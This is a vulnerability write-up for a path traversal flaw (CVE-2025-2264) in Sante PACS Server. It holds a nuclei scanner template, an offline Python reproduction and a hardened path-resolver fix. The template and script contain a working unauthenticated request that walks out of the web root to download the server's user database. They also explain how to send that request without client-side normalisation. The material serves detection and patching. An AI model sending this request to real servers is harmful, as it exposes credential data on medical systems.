Vulnerability description
A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files from the disk drive where the application is installed. The nuclei template below demonstrates this by walking out of the `/assets/` web path to fetch the server's `.HTTP/HTTP.db` SQLite database and checking the response for the SQLite header and a `USER` table.
id: CVE-2025-2264

info:
  name: Sante PACS Server.exe - Path Traversal Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
  reference:
    - https://www.tenable.com/security/research/tra-2025-08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2264
    cwe-id: CWE-22
    epss-score: 0.63971
    epss-percentile: 0.98374
    cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: santesoft
    product: sante_pacs_server
    shodan-query: http.favicon.hash:1185161484
  tags: cve,cve2025,sante,pacs,lfi,vkev

http:
  - raw:
      - |
        GET /assets/../../.HTTP/HTTP.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'SQLite','TABLE USER','format')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402203437628ab703bd87d41d2f1d4a414d77b36e2716aafad08500f15361ccf9e44402200f95c29a9fbe875231ba634ae1f5fefcdb9b8fa5bad6e2129cbee1ec1a10526b:922c64590222798bb761d5b6d8e72950
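The following Python is an added example, not part of the nuclei template or of Santesoft's code. It reproduces the template's two pieces of logic so they can be exercised offline: the raw request the template sends (sent verbatim, because the template uses a `raw` block rather than a client that might collapse `..` segments) and the DSL matcher that decides whether the response is the leaked SQLite database. The response body is a constructed SQLite file with a `USER` table, not the real `HTTP.db` schema. It also goes one step beyond the page with a hypothetical `resolve_under_root` helper showing the check a web server should apply so that the traversal (plain or percent-encoded) is rejected before any file is opened; the web root `/srv/pacs/www` in the usage is an assumption.

```python
import os
import sqlite3
import tempfile
from typing import Optional
from urllib.parse import unquote

# Traversal path exactly as the nuclei template sends it: two parent
# segments escape /assets/ and land in the application's .HTTP directory.
TRAVERSAL_PATH = "/assets/../../.HTTP/HTTP.db"


def build_request(host: str) -> bytes:
    """Raw HTTP/1.1 request equivalent to the template's `raw` block.

    It is built as bytes so that the dot segments reach the server
    unchanged; many HTTP client libraries normalise them away first.
    """
    return (
        f"GET {TRAVERSAL_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def matches_template(status_code: int, body: bytes) -> bool:
    """Mirror of the template's DSL matcher:
    contains_all(body, 'SQLite','TABLE USER','format') && status_code == 200
    """
    needles = (b"SQLite", b"TABLE USER", b"format")
    return status_code == 200 and all(n in body for n in needles)


def constructed_db_body() -> bytes:
    """Constructed sample: a minimal SQLite file holding a USER table.

    The file header starts with 'SQLite format 3\\0' and sqlite_master
    stores the CREATE statement text, so the matcher's three needles are
    all present. This is NOT the real HTTP.db schema.
    """
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "HTTP.db")
        con = sqlite3.connect(path)
        con.execute("CREATE TABLE USER (name TEXT, pwd TEXT)")
        con.commit()
        con.close()
        with open(path, "rb") as fh:
            return fh.read()


def resolve_under_root(web_root: str, url_path: str) -> Optional[str]:
    """Hypothetical hardened resolver (not the vendor's code).

    Percent-decodes the URL path, joins it under the web root, resolves
    '..' and symlinks, and refuses any result that leaves the root.
    Returns the absolute file path, or None when the request is rejected.
    """
    root = os.path.realpath(web_root)
    decoded = unquote(url_path).lstrip("/")
    candidate = os.path.realpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Offline walk-through with the constructed body.
    body = constructed_db_body()
    print(build_request("pacs.example").decode(), end="")
    print("matcher fires on leaked DB:", matches_template(200, body))
    print("matcher fires on 404 page:", matches_template(404, b"not found"))
    for p in (TRAVERSAL_PATH, "/assets/%2e%2e/%2e%2e/.HTTP/HTTP.db", "/assets/logo.png"):
        print(f"{p!r} -> {resolve_under_root('/srv/pacs/www', p)!r}")
```

The matcher keys on the SQLite magic string plus the `USER` table name, so a server that returns a generic 200 HTML page for unknown paths does not produce a false positive. When reproducing the request with your own tooling, send it over a raw socket as above or confirm with a packet capture that your client did not rewrite `/assets/../../` into `/.HTTP/HTTP.db`; a normalised request is a different test.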